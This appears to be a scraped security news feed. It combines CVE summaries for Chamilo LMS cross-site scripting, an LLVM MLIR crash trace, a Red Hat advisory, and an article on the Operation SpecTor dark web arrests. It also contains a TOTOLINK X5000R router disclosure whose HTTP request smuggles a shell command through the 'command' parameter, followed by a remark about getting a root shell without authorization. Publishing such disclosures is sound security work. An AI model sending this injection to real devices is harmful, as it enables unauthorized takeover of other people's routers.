We talk to the Signal Foundation’s Meredith Whittaker about how the surveillance economy is newer than we all might realize—and what we can do to fight back.

How to Reclaim Your Online Privacy

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the course category parameters.

CVE-2023-31804: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skype and linedin_url parameters.

CVE-2023-31802: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skills wheel parameter.

CVE-2023-31801: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the forum title parameter.

CVE-2023-31800: Security issues - Chamilo LMS

llvm-project commit fdbc55a5 was discovered to contain a segmentation fault via the component mlir::IROperand<mlir::OpOperand.

Reproduced at commit fdbc55a5

mlir-opt --canonicalize temp.mlir

temp.mlir.txt

PLEASE submit a bug report to https://github.com/llvm/llvm-project/issues/ and include the crash backtrace.
Stack dump:
0.	Program arguments: mlir-opt --canonicalize temp.mlir
Stack dump without symbol names (ensure you have llvm-symbolizer in your PATH or set the environment var \`LLVM\_SYMBOLIZER\_PATH\` to point to it):
0  mlir-opt                 0x000000010528a10c llvm::sys::PrintStackTrace(llvm::raw\_ostream&, int) + 72
1  mlir-opt                 0x000000010528a628 PrintStackTraceSignalHandler(void\*) + 28
2  mlir-opt                 0x0000000105288738 llvm::sys::RunSignalHandlers() + 148
3  mlir-opt                 0x000000010528bef8 SignalHandler(int) + 252
4  libsystem\_platform.dylib 0x00000001a33254c4 \_sigtramp + 56
5  mlir-opt                 0x0000000105320820 mlir::IROperand<mlir::OpOperand, mlir::Value>::insertIntoCurrent() + 52
6  mlir-opt                 0x0000000105320674 mlir::IROperand<mlir::OpOperand, mlir::Value>::set(mlir::Value) + 48
7  mlir-opt                 0x000000010532056c void mlir::IRObjectWithUseList<mlir::OpOperand>::replaceAllUsesWith<mlir::Value&>(mlir::Value&) + 228
8  mlir-opt                 0x00000001052ef310 mlir::Value::replaceAllUsesWith(mlir::Value) const + 40
9  mlir-opt                 0x0000000106b8f834 std::\_\_1::enable\_if<!std::is\_convertible<mlir::ValueRange&, mlir::Operation\*>::value, void>::type mlir::ResultRange::replaceAllUsesWith<mlir::ValueRange&>(mlir::ValueRange&) + 332
10 mlir-opt                 0x0000000106b8f36c void mlir::Operation::replaceAllUsesWith<mlir::ValueRange&>(mlir::ValueRange&) + 64
11 mlir-opt                 0x0000000109157758 mlir::RewriterBase::replaceOp(mlir::Operation\*, mlir::ValueRange) + 200
12 mlir-opt                 0x0000000105cb2ee8 (anonymous namespace)::DeduplicateAndRemoveDeadOperandsAndResults::matchAndRewrite(mlir::linalg::GenericOp, mlir::PatternRewriter&) const + 1240
13 mlir-opt                 0x0000000105f5a700 mlir::detail::OpOrInterfaceRewritePatternBase<mlir::linalg::GenericOp>::matchAndRewrite(mlir::Operation\*, mlir::PatternRewriter&) const + 72
14 mlir-opt                 0x0000000109b158e8 mlir::PatternApplicator::matchAndRewrite(mlir::Operation\*, mlir::PatternRewriter&, llvm::function\_ref<bool (mlir::Pattern const&)>, llvm::function\_ref<void (mlir::Pattern const&)>, llvm::function\_ref<mlir::LogicalResult (mlir::Pattern const&)>) + 1432
15 mlir-opt                 0x0000000108e67820 (anonymous namespace)::GreedyPatternRewriteDriver::simplify(llvm::MutableArrayRef<mlir::Region>) + 1640
16 mlir-opt                 0x0000000108e67068 mlir::applyPatternsAndFoldGreedily(llvm::MutableArrayRef<mlir::Region>, mlir::FrozenRewritePatternSet const&, mlir::GreedyRewriteConfig) + 240
17 mlir-opt                 0x0000000105915fb4 mlir::applyPatternsAndFoldGreedily(mlir::Operation\*, mlir::FrozenRewritePatternSet const&, mlir::GreedyRewriteConfig) + 76
18 mlir-opt                 0x0000000108d581d0 (anonymous namespace)::Canonicalizer::runOnOperation() + 132
19 mlir-opt                 0x0000000108ce0838 mlir::detail::OpToOpPassAdaptor::run(mlir::Pass\*, mlir::Operation\*, mlir::AnalysisManager, bool, unsigned int) + 512
20 mlir-opt                 0x0000000108ce0f08 mlir::detail::OpToOpPassAdaptor::runPipeline(mlir::OpPassManager&, mlir::Operation\*, mlir::AnalysisManager, bool, unsigned int, mlir::PassInstrumentor\*, mlir::PassInstrumentation::PipelineParentInfo const\*) + 364
21 mlir-opt                 0x0000000108ce30cc mlir::PassManager::runPasses(mlir::Operation\*, mlir::AnalysisManager) + 108
22 mlir-opt                 0x0000000108ce2ea0 mlir::PassManager::run(mlir::Operation\*) + 732
23 mlir-opt                 0x0000000108cc7b80 performActions(llvm::raw\_ostream&, bool, bool, llvm::SourceMgr&, mlir::MLIRContext\*, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, bool, bool) + 560
24 mlir-opt                 0x0000000108cc7714 processBuffer(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, bool, bool, bool, bool, bool, bool, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, llvm::ThreadPool\*) + 496
25 mlir-opt                 0x0000000108cc74dc mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool)::$\_0::operator()(std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&) const + 204
26 mlir-opt                 0x0000000108cc73f0 mlir::LogicalResult llvm::function\_ref<mlir::LogicalResult (std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&)>::callback\_fn<mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool)::$\_0>(long, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&) + 80
27 mlir-opt                 0x0000000108ec4700 llvm::function\_ref<mlir::LogicalResult (std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&)>::operator()(std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&) const + 96
28 mlir-opt                 0x0000000108ec41e4 mlir::splitAndProcessBuffer(std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&)>, llvm::raw\_ostream&, bool, bool) + 128
29 mlir-opt                 0x0000000108cc4e48 mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool) + 320
30 mlir-opt                 0x0000000108cc5050 mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, mlir::PassPipelineCLParser const&, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool, bool) + 296
31 mlir-opt                 0x0000000108cc5bfc mlir::MlirOptMain(int, char\*\*, llvm::StringRef, mlir::DialectRegistry&, bool) + 2888
32 mlir-opt                 0x0000000104ac9df8 main + 148
33 dyld                     0x0000000121d1d088 start + 516

CVE-2023-29932: [mlir] canonicalize pass crashed with segmentation fault · Issue #58745 · llvm/llvm-project

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

TOTOLINK X5000R (V9.1.0u.6369\_B20230113)was found to contain a command insertion vulnerability in setting/setTracerouteCfg.This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.3.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 82
    Origin: http://192.168.3.2
    Connection: close
    Referer: http://192.168.3.2/advance/traceroute.html?time=1679125513355
    Cookie: SESSION_ID=2:1679122532:2
    
    {"command":"127.0.0.1; pwd > /tmp/1.txt;","num":"4","topicurl":"setTracerouteCfg"}
    

Finally, you can write exp to get a stable root shell without authorization.

CVE-2023-30013: vuln/TOTOLINK/X5000R/2 at main · Kazamayc/vuln

Red Hat Security Advisory 2023-2097-03 - Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool. Issues addressed include code execution, cross site scripting, denial of service, deserialization, improper neutralization, information leakage, and remote shell upload vulnerabilities.

Red Hat Security Advisory 2023-2097-03

Operation SpecTor likely drew on leads from multiple dark web market busts, including the secret takedown of Monopoly Market in 2021.

A decade ago, US law enforcement was content to swat down a dark web black market for drugs and send its dealers and buyers scrambling to the next biggest anonymous online bazaar on their list. Now, one sprawling set of worldwide takedowns has revealed how those investigators are casting a much wider dragnet—one that doesn’t merely target dark web administrators, but also mines their databases for leads to relentlessly trace and arrest hundreds of dealers from those markets around the world.

Today, the US Department of Justice, Europol, and a list of law enforcement agencies in at least nine countries from Brazil to Poland revealed Operation SpecTor, a collection of dark web investigations that led to the arrest of 288 people worldwide—153 of whom were in the US. Officials also announced the seizure of nearly 1 ton of drugs, $53 million in cash and cryptocurrencies, and 117 firearms. Europol simultaneously revealed that German police had taken down the dark web site Monopoly Market, which had gone offline in late 2021 under mysterious circumstances, leaving many of its users to wonder if the market’s administrators had pulled an “exit scam” in which they absconded with users’ funds.

In Operation SpecTor, investigators appear to have leveraged information obtained through the seizure of Monopoly’s servers and data from other dark web market takedowns in recent years to find leads on hundreds of the dark web’s drug dealers—and even customers—on an unprecedented scale. “This represents the most funds seized and the highest number of arrests in any coordinated international action led by the Department of Justice against drug traffickers on the dark web,” US Attorney General Merrick Garland told reporters in a press conference. “The Justice Department is cracking down on criminal cryptocurrency transactions and the online criminal marketplaces that enable them.”

Along with Monopoly, Operation SpecTor appears to have exploited information obtained in previous dark web takedowns too. In his statement, Garland referred to both the takedown of Hydra, a Russia-based market that served as a massive hub of online drug sales and money laundering, and the smaller dark web black market Genesis, which focused on cybercrime products and services. But the Monopoly takedown, in particular, was kept under wraps for well over a year as law enforcement agencies worldwide followed leads from the case: A statement from Europol notes that “target packages” were “created by cross-matching and analyzing the collected data and evidence” from the seizure of Monopoly’s infrastructure.

All of that points to law enforcement’s increasing exploitation of the bonanza of evidence obtained in dark web takedowns. This has allowed them to carry out more far-reaching roundups of the dark web’s most prolific dealers, who are often active across multiple markets. Cryptocurrency tracing has also played a central role in expanding those operation’s targets. The databases of transactions obtained in dark web busts, if they can be decrypted, offer starting points for cryptocurrency tracers, who can then follow the money across blockchains to cryptocurrency exchanges where drug profits have been cashed out, and which can often be subpoenaed for users’ identifying information.

“It’s indeed likely that the arrests are related to data from all the different takedowns,” says one former law enforcement official involved in dark web busts, who asked not to be named. “Law enforcement combines all the information from the different seized data sets in order to identify the high-value targets. And if you identify cryptocurrency wallet addresses, you can often link activities on the different markets together, and the crypto exchanges might have the missing know-your-customer information you’re looking for.” In previous busts of dark web markets in recent years—including AlphaBay, Hansa, Wall Street Market, and Dark Market—agents obtained that sort of historical database in each case, cracking open a wealth of new leads.

Those databases can lead investigators not only to dealers on dark web markets, but also to buyers. While the DOJ and Europol didn’t reveal if any of the 288 arrests in Operation SpecTor targeted buyers, FBI deputy director Paul Abbate referred in today’s press conference to the FBI’s 56 field offices around the country carrying out “knock-and-talks” for the first time. In these operations, agents warn drug buyers that they have been identified without necessarily making arrests or pursuing charges against them.

As big as the scale of Operation SpecTor may be, it’s by no means the first DOJ operation to arrest hundreds of the dark web’s dealers. In 2020, for instance, the Justice Department announced the arrest of 179 individuals in Operation DisrupTor, and in 2021 another 150 in HunTor. (Each of those operation names refers to Tor, the anonymity software that serves as a key component of the dark web’s hidden marketplaces.)

While SpecTor nearly doubles the head count of those previous roundups of dark web dealers, it also illustrates, perhaps, that even these massive crackdowns haven’t previously prevented new generations of dealers from immediately taking their places. Even as Garland, the attorney general, touted law enforcement’s repeated successes following those dealers’ trails, he seemed to concede that the dark web’s trade in criminal contraband isn’t going away.

“There is a bit of a whack-a-mole problem here,” Garland told reporters. “We’re whacking as hard as we can.”

Cops Just Revealed a Record-Breaking Dark Web Dragnet

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 21 and April 28. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Tag

#acer